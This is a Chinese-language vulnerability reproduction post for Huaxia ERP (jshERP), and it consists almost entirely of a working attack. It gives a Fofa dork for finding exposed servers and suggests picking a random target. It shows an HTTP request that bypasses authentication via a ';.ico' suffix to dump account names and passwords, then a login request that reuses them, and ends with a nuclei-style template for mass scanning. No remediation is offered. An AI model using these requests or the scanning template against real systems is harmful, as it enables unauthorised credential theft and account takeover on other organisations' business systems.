信息描述
华夏ERP是一种企业资源规划(ERP)软件,旨在为企业提供全面的信息管理和集成解决方案,以提高效率、降低成本并优化业务流程。该软件可以帮助企业管理各种业务功能,例如财务、销售、采购、库存、生产计划等。它还具有报告和分析功能,使企业能够更好地了解其业务运营情况。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口,恶意攻击者可通过调用该接口,对用户的账号和密码进行非授权访问。
漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
#Fofa搜索语法"jshERP-boot"
步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容....在响应包中可以看到json格式的用户名密码。
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: */*Referer: http://1.12.225.89/Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close
步骤三:抓取登录数据包,替换用户名密码即可登入系统。
POST /jshERP-boot/user/login HTTP/1.1Host: youripContent-Length: 68Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Content-Type: application/json;charset=UTF-8Origin:Referer:Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close{"loginName":"loginname","password":"password"}
批量脚本
id: huaxiaERP-information-leakageinfo:name: huaxiaERP-information-leakageauthor:xingyunseverity: mediumdescription: 华夏ERP信息泄露requests:method: GETpath:"{{BaseURL}}/jshERP-boot/user/getAllList;.ico": andmatchers:type: statusstatus:200type: wordwords:"username"
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...